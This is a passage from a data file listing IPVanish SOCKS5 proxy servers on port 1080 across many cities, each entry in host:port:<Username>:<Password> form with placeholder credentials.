ord>\\nlon-a33.ipvanish.com:1080:<Username>:<Password>\\nlon-a48.ipvanish.com:1080:<Username>:<Password>\\nlon-a35.ipvanish.com:1080:<Username>:<Password>\\nlon-a49.ipvanish.com:1080:<Username>:<Password>\\nlon-a28.ipvanish.com:1080:<Username>:<Password>\\nlon-a50.ipvanish.com:1080:<Username>:<Password>\\nlon-a30.ipvanish.com:1080:<Username>:<Password>\\nlon-a51.ipvanish.com:1080:<Username>:<Password>\\nlon-a32.ipvanish.com:1080:<Username>:<Password>\\nlon-a52.ipvanish.com:1080:<Username>:<Password>\\nlon-a34.ipvanish.com:1080:<Username>:<Password>\\nlon-a53.ipvanish.com:1080:<Username>:<Password>\\nlon-a36.ipvanish.com:1080:<Username>:<Password>\\nlon-a12.ipvanish.com:1080:<Username>:<Password>\\nlon-a03.ipvanish.com:1080:<Username>:<Password>\\nlon-a54.ipvanish.com:1080:<Username>:<Password>\\nlon-a14.ipvanish.com:1080:<Username>:<Password>\\nlon-a04.ipvanish.com:1080:<Username>:<Password>\\nlon-a55.ipvanish.com:1080:<Username>:<Password>\\nlon-a16.ipvanish.com:1080:<Username>:<Password>\\nlon-a05.ipvanish.com:1080:<Username>:<Password>\\nlon-a56.ipvanish.com:1080:<Username>:<Password>\\nlon-a18.ipvanish.com:1080:<Username>:<Password>\\nlon-a06.ipvanish.com:1080:<Username>:<Password>\\nlon-a57.ipvanish.com:1080:<Username>:<Password>\\nlon-a20.ipvanish.com:1080:<Username>:<Password>\\nlon-a58.ipvanish.com:1080:<Username>:<Password>\\nlon-a59.ipvanish.com:1080:<Username>:<Password>\\nlhr-c04.ipvanish.com:1080:<Username>:<Password>\\nlhr-c01.ipvanish.com:1080:<Username>:<Password>\\nlhr-c02.ipvanish.com:1080:<Username>:<Password>\\nlhr-c03.ipvanish.com:1080:<Username>:<Password>\\nman-c03.ipvanish.com:1080:<Username>:<Password>\\nman-c06.ipvanish.com:1080:<Username>:<Password>\\nman-c07.ipvanish.com:1080:<Username>:<Password>\\nman-c08.ipvanish.com:1080:<Username>:<Password>\\nman-c09.ipvanish.com:1080:<Username>:<Password>\\nman-c10.ipvanish.com:1080:<Username>:<Password>\\nman-c11.ipvanish.com:1080:<Username>:<Password>\\nman-c12.ipvanish.com:1080:<Username>:<Password>\\nman-c13.ipvanish.com:1080:<Username>:<Password>\\nman-c14.ipvanish.com:1080:<Username>:<Password>\\nman-c15.ipvanish.com:1080:<Username>:<Password>\\nman-c16.ipvanish.com:1080:<Username>:<Password>\\nman-c17.ipvanish.com:1080:<Username>:<Password>\\nman-c18.ipvanish.com:1080:<Username>:<Password>\\nman-c02.ipvanish.com:1080:<Username>:<Password>\\nman-c01.ipvanish.com:1080:<Username>:<Password>\\nman-c04.ipvanish.com:1080:<Username>:<Password>\\nman-c05.ipvanish.com:1080:<Username>:<Password>\\niev-c01.ipvanish.com:1080:<Username>:<Password>\\niev-c02.ipvanish.com:1080:<Username>:<Password>\\niev-c03.ipvanish.com:1080:<Username>:<Password>\\niev-c04.ipvanish.com:1080:<Username>:<Password>\\niev-c05.ipvanish.com:1080:<Username>:<Password>\\niev-c06.ipvanish.com:1080:<Username>:<Password>\\ntpe-c01.ipvanish.com:1080:<Username>:<Password>\\ntpe-c02.ipvanish.com:1080:<Username>:<Password>\\nbts-c01.ipvanish.com:1080:<Username>:<Password>\\nbts-c02.ipvanish.com:1080:<Username>:<Password>\\nbts-c04.ipvanish.com:1080:<Username>:<Password>\\nbts-c03.ipvanish.com:1080:<Username>:<Password>\\nlju-c01.ipvanish.com:1080:<Username>:<Password>\\nlju-c02.ipvanish.com:1080:<Username>:<Password>\\nlju-c03.ipvanish.com:1080:<Username>:<Password>\\nlju-c04.ipvanish.com:1080:<Username>:<Password>\\nlju-c05.ipvanish.com:1080:<Username>:<Password>\\nlju-c06.ipvanish.com:1080:<Username>:<Password>\\nsin-a04.ipvanish.com:1080:<Username>:<Password>\\nsin-a05.ipvanish.com:1080:<Username>:<Password>\\nsin-a06.ipvanish.com:1080:<Username>:<Password>\\nsin-a07.ipvanish.com:1080:<Username>:<Password>\\nsin-a08.ipvanish.com:1080:<Username>:<Password>\\nsin-a09.ipvanish.com:1080:<Username>:<Password>\\nsin-a10.ipvanish.com:1080:<Username>:<Password>\\nsin-a11.ipvanish.com:1080:<Username>:<Password>\\nsin-a12.ipvanish.com:1080:<Username>:<Password>\\nsin-a13.ipvanish.com:1080:<Username>:<Password>\\nsin-a14.ipvanish.com:1080:<Username>:<Password>\\nsin-a15.ipvanish.com:1080:<Username>:<Password>\\nsin-a16.ipvanish.com:1080:<Username>:<Password>\\nsin-a17.ipvanish.com:1080:<Username>:<Password>\\nsin-a18.ipvanish.com:1080:<Username>:<Password>\\nsin-a19.ipvanish.com:1080:<Username>:<Password>\\nsin-a20.ipvanish.com:1080:<Username>:<Password>\\nsin-a21.ipvanish.com:1080:<Username>:<Password>\\nsin-a22.ipvanish.com:1080:<Username>:<Password>\\nsin-a23.ipvanish.com:1080:<Username>:<Password>\\nsin-a24.ipvanish.com:1080:<Username>:<Password>\\nsin-a25.ipvanish.com:1080:<Username>:<Password>\\nsin-a26.ipvanish.com:1080:<Username>:<Password>\\nsin-a27.ipvanish.com:1080:<Username>:<Password>\\nsin-a28.ipvanish.com:1080:<Username>:<Password>\\nsin-a29.ipvanish.com:1080:<Username>:<Password>\\nsin-a30.ipvanish.com:1080:<Username>:<Password>\\nsin-a01.ipvanish.com:1080:<Username>:<Password>\\nsin-a02.ipvanish.com:1080:<Username>:<Password>\\nsin-a03.ipvanish.com:1080:<Username>:<Password>\\nsto-a15.ipvanish.com:1080:<Username>:<Password>\\nsto-a16.ipvanish.com:1080:<Username>:<Password>\\nsto-a17.ipvanish.com:1080:<Username>:<Password>\\nsto-a18.ipvanish.com:1080:<Username>:<Password>\\nsto-a19.ipvanish.com:1080:<Username>:<Password>\\nsto-a20.ipvanish.com:1080:<Username>:<Password>\\nsto-a21.ipvanish.com:1080:<Username>:<Password>\\nsto-a22.ipvanish.com:1080:<Username>:<Password>\\nsto-a23.ipvanish.com:1080:<Username>:<Password>\\nsto-a24.ipvanish.com:1080:<Username>:<Password>\\nsto-a02.ipvanish.com:1080:<Username>:<Password>\\nsto-a25.ipvanish.com:1080:<Username>:<Password>\\nsto-a03.ipvanish.com:1080:<Username>:<Password>\\nsto-a26.ipvanish.com:1080:<Username>:<Password>\\nsto-a05.ipvanish.com:1080:<Username>:<Password>\\nsto-a27.ipvanish.com:1080:<Username>:<Password>\\nsto-a07.ipvanish.com:1080:<Username>:<Password>\\nsto-a28.ipvanish.com:1080:<Username>:<Password>\\nsto-a09.ipvanish.com:1080:<Username>:<Password>\\nsto-a29.ipvanish.com:1080:<Username>:<Password>\\nsto-a11.ipvanish.com:1080:<Username>:<Password>\\nsto-a30.ipvanish.com:1080:<Username>:<Password>\\nsto-a01.ipvanish.com:1080:<Username>:<Password>\\nsto-a04.ipvanish.com:1080:<Username>:<Password>\\nsto-a06.ipvanish.com:1080:<Username>:<Password>\\nsto-a08.ipvanish.com:1080:<Username>:<Password>\\nsto-a10.ipvanish.com:1080:<Username>:<Password>\\nsto-a13.ipvanish.com:1080:<Username>:<Password>\\nsto-a12.ipvanish.com:1080:<Username>:<Password>\\nsto-a14.ipvanish.com:1080:<Username>:<Password>\\nbeg-c01.ipvanish.com:1080:<Username>:<Password>\\nbeg-c02.ipvanish.com:1080:<Username>:<Password>\\nbeg-c03.ipvanish.com:1080:<Username>:<Password>\\notp-c01.ipvanish.com:1080:<Username>:<Password>\\notp-c02.ipvanish.com:1080:<Username>:<Password>\\notp-c03.ipvanish.com:1080:<Username>:<Password>\\nlis-c11.ipvanish.com:1080:<Username>:<Password>\\nlis-c12.ipvanish.com:1080:<Username>:<Password>\\nlis-c13.ipvanish.com:1080:<Username>:<Password>\\nlis-c14.ipvanish.com:1080:<Username>:<Password>\\nlis-c10.ipvanish.com:1080:<Username>:<Password>\\nwaw-a01.ipvanish.com:1080:<Username>:<Password>\\nwaw-a02.ipvanish.com:1080:<Username>:<Password>\\nwaw-a03.ipvanish.com:1080:<Username>:<Password>\\nwaw-a04.ipvanish.com:1080:<Username>:<Password>\\nwaw-a08.ipvanish.com:1080:<Username>:<Password>\\nwaw-a09.ipvanish.com:1080:<Username>:<Password>\\nwaw-a10.ipvanish.com:1080:<Username>:<Password>\\nwaw-a11.ipvanish.com:1080:<Username>:<Password>\\nlim-c01.ipvanish.com:1080:<Username>:<Password>\\nlim-c02.ipvanish.com:1080:<Username>:<Password>\\nlim-c03.ipvanish.com:1080:<Username>:<Password>\\nlim-c04.ipvanish.com:1080:<Username>:<Password>\\nlim-c05.ipvanish.com:1080:<Username>:<Password>\\nlim-c06.ipvanish.com:1080:<Username>:<Password>\\nlim-c07.ipvanish.com:1080:<Username>:<Password>\\nakl-c13.ipvanish.com:1080:<Username>:<Password>\\nakl-c12.ipvanish.com:1080:<Username>:<Password>\\nosl-c06.ipvanish.com:1080:<Username>:<Password>\\nosl-c03.ipvanish.com:1080:<Username>:<Password>\\nosl-c04.ipvanish.com:1080:<Username>:<Password>\\nosl-c05.ipvanish.com:1080:<Username>:<Password>\\nosl-c01.ipvanish.com:1080:<Username>:<Password>\\nosl-c02.ipvanish.com:1080:<Username>:<Password>\\nams-c41.ipvanish.com:1080:<Username>:<Password>\\nams-c42.ipvanish.com:1080:<Username>:<Password>\\nams-c43.ipvanish.com:1080:<Username>:<Password>\\nams-c44.ipvanish.com:1080:<Username>:<Password>\\nams-c45.ipvanish.com:1080:<Username>:<Password>\\nams-c46.ipvanish.com:1080:<Username>:<Password>\\nams-c47.ipvanish.com:1080:<Username>:<Password>\\nams-c48.ipvanish.com:1080:<Username>:<Password>\\nams-c49.ipvanish.com:1080:<Username>:<Password>\\nams-a31.ipvanish.com:1080:<Username>:<Password>\\nams-a32.ipvanish.com:1080:<Username>:<Password>\\nams-a33.ipvanish.com:1080:<Username>:<Password>\\nams-a34.ipvanish.com:1080:<Username>:<Password>\\nams-a35.ipvanish.com:1080:<Username>:<Password>\\nams-a36.ipvanish.com:1080:<Username>:<Password>\\nams-a39.ipvanish.com:1080:<Username>:<Password>\\nams-c37.ipvanish.com:1080:<Username>:<Password>\\nams-a37.ipvanish.com:1080:<Username>:<Password>\\nams-c38.ipvanish.com:1080:<Username>:<Password>\\nams-c50.ipvanish.com:1080:<Username>:<Password>\\nams-a38.ipvanish.com:1080:<Username>:<Password>\\nams-c39.ipvanish.com:1080:<Username>:<Password>\\nams-c51.ipvanish.com:1080:<Username>:<Password>\\nams-a40.ipvanish.com:1080:<Username>:<Password>\\nams-c40.ipvanish.com:1080:<Username>:<Password>\\nams-c52.ipvanish.com:1080:<Username>:<Password>\\nams-a41.ipvanish.com:1080:<Username>:<Password>\\nams-a50.ipvanish.com:1080:<Username>:<Password>\\nams-c53.ipvanish.com:1080:<Username>:<Password>\\nams-a51.ipvanish.com:1080:<Username>:<Password>\\nams-c54.ipvanish.com:1080:<Username>:<Password>\\nams-a52.ipvanish.com:1080:<Username>:<Password>\\nams-c55.ipvanish.com:1080:<Username>:<Password>\\nams-a54.ipvanish.com:1080:<Username>:<Password>\\nams-c56.ipvanish.com:1080:<Username>:<Password>\\nams-a55.ipvanish.com:1080:<Username>:<Password>\\nams-a56.ipvanish.com:1080:<Username>:<Password>\\nams-a57.ipvanish.com:1080:<Username>:<Password>\\nams-a58.ipvanish.com:1080:<Username>:<Password>\\nams-a59.ipvanish.com:1080:<Username>:<Password>\\nams-a16.ipvanish.com:1080:<Username>:<Password>\\nams-a60.ipvanish.com:1080:<Username>:<Password>\\nams-a18.ipvanish.com:1080:<Username>:<Password>\\nams-a61.ipvanish.com:1080:<Username>:<Password>\\nams-a20.ipvanish.com:1080:<Username>:<Password>\\nams-a22.ipvanish.com:1080:<Username>:<Password>\\nams-a24.ipvanish.com:1080:<Username>:<Password>\\nams-a15.ipvanish.com:1080:<Username>:<Password>\\nams-a17.ipvanish.com:1080:<Username>:<Password>\\nams-a19.ipvanish.com:1080:<Username>:<Password>\\nams-a21.ipvanish.com:1080:<Username>:<Password>\\nams-a23.ipvanish.com:1080:<Username>:<Password>\\nams-a03.ipvanish.com:1080:<Username>:<Password>\\nams-a25.ipvanish.com:1080:<Username>:<Password>\\nams-a04.ipvanish.com:1080:<Username>:<Password>\\nams-a26.ipvanish.com:1080:<Username>:<Password>\\nams-a05.ipvanish.com:1080:<Username>:<Password>\\nams-a27.ipvanish.com:1080:<Username>:<Password>\\nams-a06.ipvanish.com:1080:<Username>:<Password>\\nams-a28.ipvanish.com:1080:<Username>:<Password>\\nams-a07.ipvanish.com:1080:<Username>:<Password>\\nams-a29.ipvanish.com:1080:<Username>:<Password>\\nams-a08.ipvanish.com:1080:<Username>:<Password>\\nams-a30.ipvanish.com:1080:<Username>:<Password>\\nams-a09.ipvanish.com:1080:<Username>:<Password>\\nams-a10.ipvanish.com:1080:<Username>:<Password>\\nams-a11.ipvanish.com:1080:<Username>:<Password>\\nams-a12.ipvanish.com:1080:<Username>:<Password>\\nams-a13.ipvanish.com:1080:<Username>:<Password>\\nams-a14.ipvanish.com:1080:<Username>:<Password>\\nlos-c01.ipvanish.com:1080:<Username>:<Password>\\nlos-c02.ipvanish.com:1080:<Username>:<Password>\\nlos-c03.ipvanish.com:1080:<Username>:<Password>\\nlos-c04.ipvanish.com:1080:<Username>:<Password>\\nlos-c05.ipvanish.com:1080:<Username>:<Password>\\nkul-c02.ipvanish.com:1080:<Username>:<Password>\\nkul-c01.ipvanish.com:1080:<Username>:<Password>\\ngdl-c08.ipvanish.com:1080:<Username>:<Password>\\ngdl-c09.ipvanish.com:1080:<Username>:<Password>\\ngdl-c11.ipvanish.com:1080:<Username>:<Password>\\ngdl-c12.ipvanish.com:1080:<Username>:<Password>\\nkiv-c02.ipvanish.com:1080:<Username>:<Password>\\nkiv-c03.ipvanish.com:1080:<Username>:<Password>\\nrix-c01.ipvanish.com:1080:<Username>:<Password>\\nrix-c02.ipvanish.com:1080:<Username>:<Password>\\nrix-c03.ipvanish.com:1080:<Username>:<Password>\\nrix-c04.ipvanish.com:1080:<Username>:<Password>\\nrix-c05.ipvanish.com:1080:<Username>:<Password>\\nlux-c02.ipvanish.com:1080:<Username>:<Password>\\nlux-c03.ipvanish.com:1080:<Username>:<Password>\\nsel-a03.ipvanish.com:1080:<Username>:<Password>\\nsel-a04.ipvanish.com:1080:<Username>:<Password>\\nsel-a02.ipvanish.com:1080:<Username>:<Password>\\nsel-a01.ipvanish.com:1080:<Username>:<Password>\\nnrt-a03.ipvanish.com:1080:<Username>:<Password>\\nnrt-a05.ipvanish.com:1080:<Username>:<Password>\\nnrt-a04.ipvanish.com:1080:<Username>:<Password>\\nnrt-a06.ipvanish.com:1080:<Username>:<Password>\\nnrt-a02.ipvanish.com:1080:<Username>:<Password>\\nnrt-a07.ipvanish.com:1080:<Username>:<Password>\\nnrt-a08.ipvanish.com:1080:<Username>:<Password>\\nnrt-a09.ipvanish.com:1080:<Username>:<Password>\\nnrt-a10.ipvanish.com:1080:<Username>:<Password>\\nnrt-a01.ipvanish.com:1080:<Username>:<Password>\\nnrt-a11.ipvanish.com:1080:<Username>:<Password>\\nnrt-a12.ipvanish.com:1080:<Username>:<Password>\\nnrt-a13.ipvanish.com:1080:<Username>:<Password>\\nnrt-a14.ipvanish.com:1080:<Username>:<Password>\\nnrt-a15.ipvanish.com:1080:<Username>:<Password>\\nnrt-a16.ipvanish.com:1080:<Username>:<Password>\\nnrt-a17.ipvanish.com:1080:<Username>:<Password>\\nnrt-a18.ipvanish.com:1080:<Username>:<Password>\\nnrt-a19.ipvanish.com:1080:<Username>:<Password>\\nnrt-a20.ipvanish.com:1080:<Username>:<Password>\\nlin-c01.ipvanish.com:1080:<Username>:<Password>\\nlin-c02.ipvanish.com:1080:<Username>:<Password>\\nlin-c03.ipvanish.com:1080:<Username>:<Password>\\nlin-c04.ipvanish.com:1080:<Username>:<Password>\\nlin-c07.ipvanish.com:1080:<Username>:<Password>\\nlin-c08.ipvanish.com:1080:<Username>:<Password>\\nlin-c09.ipvanish.com:1080:<Username>:<Password>\\nlin-c05.ipvanish.com:1080:<Username>:<Password>\\nlin-c06.ipvanish.com:1080:<Username>:<Password>\\nlin-a05.ipvanish.com:1080:<Username>:<Password>\\nlin-a06.ipvanish.com:1080:<Username>:<Password>\\nlin-a07.ipvanish.com:1080:<Username>:<Password>\\nlin-a08.ipvanish.com:1080:<Username>:<Password>\\nlin-a09.ipvanish.com:1080:<Username>:<Password>\\nlin-a10.ipvanish.com:1080:<Username>:<Password>\\nlin-a11.ipvanish.com:1080:<Username>:<Password>\\nlin-a12.ipvanish.com:1080:<Username>:<Password>\\nlin-a01.ipvanish.com:1080:<Username>:<Password>\\nlin-a02.ipvanish.com:1080:<Username>:<Password>\\nlin-a03.ipvanish.com:1080:<Username>:<Password>\\nlin-a04.ipvanish.com:1080:<Username>:<Password>\\nrkv-c01.ipvanish.com:1080:<Username>:<Password>\\nrkv-c02.ipvanish.com:1080:<Username>:<Password>\\nbom-c01.ipvanish.com:1080:<Username>:<Password>\\nbom-c02.ipvanish.com:1080:<Username>:<Password>\\nbom-c03.ipvanish.com:1080:<Username>:<Password>\\nbom-c04.ipvanish.com:1080:<Username>:<Password>\\nbom-c05.ipvanish.com:1080:<Username>:<Password>\\nbom-c06.ipvanish.com:1080:<Username>:<Password>\\ndel-c04.ipvanish.com:1080:<Username>:<Password>\\ndel-c05.ipvanish.com:1080:<Username>:<Password>\\ntlv-c05.ipvanish.com:1080:<Username>:<Password>\\ntlv-c06.ipvanish.com:1080:<Username>:<Password>\\ntlv-c07.ipvanish.com:1080:<Username>:<Password>\\ntlv-c03.ipvanish.com:1080:<Username>:<Password>\\ntlv-c04.ipvanish.com:1080:<Username>:<Password>\\ntlv-c01.ipvanish.com:1080:<Username>:<Password>\\ntlv-c02.ipvanish.com:1080:<Username>:<Password>\\ndub-c11.ipvanish.com:1080:<Username>:<Password>\\ndub-c12.ipvanish.com:1080:<Username>:<Password>\\ndub-c13.ipvanish.com:1080:<Username>:<Password>\\ndub-c04.ipvanish.com:1080:<Username>:<Password>\\ndub-c05.ipvanish.com:1080:<Username>:<Password>\\nbud-c01.ipvanish.com:1080:<Username>:<Password>\\nbud-c02.ipvanish.com:1080:<Username>:<Password>\\nbud-c03.ipvanish.com:1080:<Username>:<Password>\\nbud-c04.ipvanish.com:1080:<Username>:<Password>\\nzag-c04.ipvanish.com:1080:<Username>:<Password>\\nzag-c05.ipvanish.com:1080:<Username>:<Password>\\nzag-c02.ipvanish.com:1080:<Username>:<Password>\\nzag-c03.ipvanish.com:1080:<Username>:<Password>\\nath-c01.ipvanish.com:1080:<Username>:<Password>\\nath-c02.ipvanish.com:1080:<Username>:<Password>\\nath-c03.ipvanish.com:1080:<Username>:<Password>\\nbod-c01.ipvanish.com:1080:<Username>:<Password>\\nbod-c02.ipvanish.com:1080:<Username>:<Password>\\nbod-c03.ipvanish.com:1080:<Username>:<Password>\\nbod-c04.ipvanish.com:1080:<Username>:<Password>\\nbod-c05.ipvanish.com:1080:<Username>:<Password>\\nbod-c06.ipvanish.com:1080:<Username>:<Password>\\nbod-c07.ipvanish.com:1080:<Username>:<Password>\\nbod-c08.ipvanish.com:1080:<Username>:<Password>\\nbod-c09.ipvanish.com:1080:<Username>:<Password>\\nmrs-c01.ipvanish.com:1080:<Username>:<Password>\\nmrs-c02.ipvanish.com:1080:<Username>:<Password>\\nmrs-c03.ipvanish.com:1080:<Username>:<Password>\\nmrs-c04.ipvanish.com:1080:<Username>:<Password>\\npar-a13.ipvanish.com:1080:<Username>:<Password>\\npar-a14.ipvanish.com:1080:<Username>:<Password>\\npar-a15.ipvanish.com:1080:<Username>:<Password>\\npar-a16.ipvanish.com:1080:<Username>:<Password>\\npar-a17.ipvanish.com:1080:<Username>:<Password>\\npar-a18.ipvanish.com:1080:<Username>:<Password>\\npar-a19.ipvanish.com:1080:<Username>:<Password>\\npar-a20.ipvanish.com:1080:<Username>:<Password>\\npar-a21.ipvanish.com:1080:<Username>:<Password>\\npar-a22.ipvanish.com:1080:<Username>:<Password>\\npar-a23.ipvanish.com:1080:<Username>:<Password>\\npar-a24.ipvanish.com:1080:<Username>:<Password>\\npar-a25.ipvanish.com:1080:<Username>:<Password>\\npar-a26.ipvanish.com:1080:<Username>:<Password>\\npar-a02.ipvanish.com:1080:<Username>:<Password>\\npar-a03.ipvanish.com:1080:<Username>:<Password>\\npar-a05.ipvanish.com:1080:<Username>:<Password>\\npar-a01.ipvanish.com:1080:<Username>:<Password>\\npar-a07.ipvanish.com:1080:<Username>:<Password>\\npar-a04.ipvanish.com:1080:<Username>:<Password>\\npar-a09.ipvanish.com:1080:<Username>:<Password>\\npar-a11.ipvanish.com:1080:<Username>:<Password>\\npar-a06.ipvanish.com:1080:<Username>:<Password>\\npar-a08.ipvanish.com:1080:<Username>:<Password>\\npar-a10.ipvanish.com:1080:<Username>:<Password>\\npar-a12.ipvanish.com:1080:<Username>:<Password>\\nhel-c06.ipvanish.com:1080:<Username>:<Password>\\nhel-c07.ipvanish.com:1080:<Username>:<Password>\\nhel-c08.ipvanish.com:1080:<Username>:<Password>\\nhel-c09.ipvanish.com:1080:<Username>:<Password>\\nhel-c10.ipvanish.com:1080:<Username>:<Password>\\nhel-c01.ipvanish.com:1080:<Username>:<Password>\\nhel-c02.ipvanish.com:1080:<Username>:<Password>\\nhel-c03.ipvanish.com:1080:<Username>:<Password>\\nhel-c04.ipvanish.com:1080:<Username>:<Password>\\nhel-c05.ipvanish.com:1080:<Username>:<Password>\\nhel-c13.ipvanish.com:1080:<Username>:<Password>\\nmad-a28.ipvanish.com:1080:<Username>:<Password>\\nmad-a29.ipvanish.com:1080:<Username>:<Password>\\nmad-a30.ipvanish.com:1080:<Username>:<Password>\\nmad-a02.ipvanish.com:1080:<Username>:<Password>\\nmad-a03.ipvanish.com:1080:<Username>:<Password>\\nmad-a04.ipvanish.com:1080:<Username>:<Password>\\nmad-a01.ipvanish.com:1080:<Username>:<Password>\\nmad-a07.ipvanish.com:1080:<Username>:<Password>\\nmad-a08.ipvanish.com:1080:<Username>:<Password>\\nmad-a09.ipvanish.com:1080:<Username>:<Password>\\nmad-a10.ipvanish.com:1080:<Username>:<Password>\\nmad-a11.ipvanish.com:1080:<Username>:<Password>\\nmad-a12.ipvanish.com:1080:<Username>:<Password>\\nmad-a13.ipvanish.com:1080:<Username>:<Password>\\nmad-a14.ipvanish.com:1080:<Username>:<Password>\\nmad-a05.ipvanish.com:1080:<Username>:<Password>\\nmad-a15.ipvanish.com:1080:<Username>:<Password>\\nmad-a06.ipvanish.com:1080:<Username>:<Password>\\nmad-a16.ipvanish.com:1080:<Username>:<Password>\\nmad-a17.ipvanish.com:1080:<Username>:<Password>\\nmad-a18.ipvanish.com:1080:<Username>:<Password>\\nmad-a19.ipvanish.com:1080:<Username>:<Password>\\nmad-a20.ipvanish.com:1080:<Username>:<Password>\\nmad-a21.ipvanish.com:1080:<Username>:<Password>\\nmad-a22.ipvanish.com:1080:<Username>:<Password>\\nmad-a23.ipvanish.com:1080:<Username>:<Password>\\nmad-a24.ipvanish.com:1080:<Username>:<Password>\\nmad-a25.ipvanish.com:1080:<Username>:<Password>\\nmad-a26.ipvanish.com:1080:<Username>:<Password>\\nmad-a27.ipvanish.com:1080:<Username>:<Password>\\nvlc-c03.ipvanish.com:1080:<Username>:<Password>\\nvlc-c04.ipvanish.com:1080:<Username>:<Password>\\nvlc-c05.ipvanish.com:1080:<Username>:<Password>\\nvlc-c06.ipvanish.com:1080:<Username>:<Password>\\ntll-c03.ipvanish.com:1080:<Username>:<Password>\\ntll-c04.ipvanish.com:1080:<Username>:<Password>\\ntll-c05.ipvanish.com:1080:<Username>:<Password>\\ntll-c06.ipvanish.com:1080:<Username>:<Password>\\ncph-c09.ipvanish.com:1080:<Username>:<Password>\\ncph-c10.ipvanish.com:1080:<Username>:<Password>\\ncph-c11.ipvanish.com:1080:<Username>:<Password>\\ncph-c12.ipvanish.com:1080:<Username>:<Password>\\ncph-c13.ipvanish.com:1080:<Username>:<Password>\\ncph-c14.ipvanish.com:1080:<Username>:<Password>\\ncph-c15.ipvanish.com:1080:<Username>:<Password>\\ncph-c16.ipvanish.com:1080:<Username>:<Password>\\ncph-c17.ipvanish.com:1080:<Username>:<Password>\\ncph-c18.ipvanish.com:1080:<Username>:<Password>\\ncph-c19.ipvanish.com:1080:<Username>:<Password>\\ncph-c20.ipvanish.com:1080:<Username>:<Password>\\nfra-a20.ipvanish.com:1080:<Username>:<Password>\\nfra-a22.ipvanish.com:1080:<Username>:<Password>\\nfra-a03.ipvanish.com:1080:<Username>:<Password>\\nfra-a24.ipvanish.com:1080:<Username>:<Password>\\nfra-a04.ipvanish.com:1080:<Username>:<Password>\\nfra-a26.ipvanish.com:1080:<Username>:<Password>\\nfra-a17.ipvanish.com:1080:<Username>:<Password>\\nfra-a19.ipvanish.com:1080:<Username>:<Password>\\nfra-a21.ipvanish.com:1080:<Username>:<Password>\\nfra-a23.ipvanish.com:1080:<Username>:<Password>\\nfra-a25.ipvanish.com:1080:<Username>:<Password>\\nfra-a06.ipvanish.com:1080:<Username>:<Password>\\nfra-a08.ipvanish.com:1080:<Username>:<Password>\\nfra-a10.ipvanish.com:1080:<Username>:<Password>\\nfra-a12.ipvanish.com:1080:<Username>:<Password>\\nfra-a14.ipvanish.com:1080:<Username>:<Password>\\nfra-a16.ipvanish.com:1080:<Username>:<Password>\\nfra-a05.ipvanish.com:1080:<Username>:<Password>\\nfra-a42.ipvanish.com:1080:<Username>:<Password>\\nfra-a07.ipvanish.com:1080:<Username>:<Password>\\nfra-a43.ipvanish.com:1080:<Username>:<Password>\\nfra-a09.ipvanish.com:1080:<Username>:<Password>\\nfra-a44.ipvanish.com:1080:<Username>:<Password>\\nfra-a11.ipvanish.com:1080:<Username>:<Password>\\nfra-a13.ipvanish.com:1080:<Username>:<Password>\\nfra-a15.ipvanish.com:1080:<Username>:<Password>\\nfra-a39.ipvanish.com:1080:<Username>:<Password>\\nfra-c01.ipvanish.com:1080:<Username>:<Password>\\nfra-c02.ipvanish.com:1080:<Username>:<Password>\\nfra-c03.ipvanish.com:1080:<Username>:<Password>\\nfra-c04.ipvanish.com:1080:<Username>:<Password>\\nfra-c05.ipvanish.com:1080:<Username>:<Password>\\nfra-c06.ipvanish.com:1080:<Username>:<Password>\\nfra-c07.ipvanish.com:1080:<Username>:<Password>\\nfra-c08.ipvanish.com:1080:<Username>:<Password>\\nfra-c09.ipvanish.com:1080:<Username>:<Password>\\nfra-c10.ipvanish.com:1080:<Username>:<Password>\\nfra-c11.ipvanish.com:1080:<Username>:<Password>\\nfra-a02.ipvanish.com:1080:<Username>:<Password>\\nfra-c12.ipvanish.com:1080:<Username>:<Password>\\nfra-a32.ipvanish.com:1080:<Username>:<Password>\\nfra-c13.ipvanish.com:1080:<Username>:<Password>\\nfra-a33.ipvanish.com:1080:<Username>:<Password>\\nfra-c14.ipvanish.com:1080:<Username>:<Password>\\nfra-a34.ipvanish.com:1080:<Username>:<Password>\\nfra-c15.ipvanish.com:1080:<Username>:<Password>\\nfra-a01.ipvanish.com:1080:<Username>:<Password>\\nfra-a35.ipvanish.com:1080:<Username>:<Password>\\nfra-c16.ipvanish.com:1080:<Username>:<Password>\\nfra-a36.ipvanish.com:1080:<Username>:<Password>\\nfra-c17.ipvanish.com:1080:<Username>:<Password>\\nfra-a37.ipvanish.com:1080:<Username>:<Password>\\nfra-c18.ipvanish.com:1080:<Username>:<Password>\\nfra-a38.ipvanish.com:1080:<Username>:<Password>\\nfra-a40.ipvanish.com:1080:<Username>:<Password>\\nfra-a41.ipvanish.com:1080:<Username>:<Password>\\nfra-a27.ipvanish.com:1080:<Username>:<Password>\\nfra-a29.ipvanish.com:1080:<Username>:<Password>\\nfra-a28.ipvanish.com:1080:<Username>:<Password>\\nfra-a30.ipvanish.com:1080:<Username>:<Password>\\nfra-a31.ipvanish.com:1080:<Username>:<Password>\\nfra-a18.ipvanish.com:1080:<Username>:<Password>\\nprg-c09.ipvanish.com:1080:<Username>:<Password>\\nprg-c10.ipvanish.com:1080:<Username>:<Password>\\nprg-c11.ipvanish.com:1080:<Username>:<Password>\\nprg-c12.ipvanish.com:1080:<Username>:<Password>\\nprg-c13.ipvanish.com:1080:<Username>:<Password>\\nprg-c15.ipvanish.com:1080:<Username>:<Password>\\nprg-c16.ipvanish.com:1080:<Username>:<Password>\\nprg-c17.ipvanish.com:1080:<Username>:<Password>\\nprg-c18.ipvanish.com:1080:<Username>:<Password>\\nprg-c19.ipvanish.com:1080:<Username>:<Password>\\nprg-c20.ipvanish.com:1080:<Username>:<Password>\\nsjo-c05.ipvanish.com:1080:<Username>:<Password>\\nsjo-c02.ipvanish.com:1080:<Username>:<Password>\\nsjo-c03.ipvanish.com:1080:<Username>:<Password>\\nsjo-c04.ipvanish.com:1080:<Username>:<Password>\\nbog-c01.ipvanish.com:1080:<Username>:<Password>\\nbog-c02.ipvanish.com:1080:<Username>:<Password>\\nbog-c03.ipvanish.com:1080:<Username>:<Password>\\nbog-c04.ipvanish.com:1080:<Username>:<Password>\\nbog-c05.ipvanish.com:1080:<Username>:<Password>\\nscl-c01.ipvanish.com:1080:<Username>:<Password>\\nscl-c02.ipvanish.com:1080:<Username>:<Password>\\nscl-c03.ipvanish.com:1080:<Username>:<Password>\\nscl-c04.ipvanish.com:1080:<Username>:<Password>\\nscl-c05.ipvanish.com:1080:<Username>:<Password>\\nzrh-c02.ipvanish.com:1080:<Username>:<Password>\\nzrh-c03.ipvanish.com:1080:<Username>:<Password>\\nzrh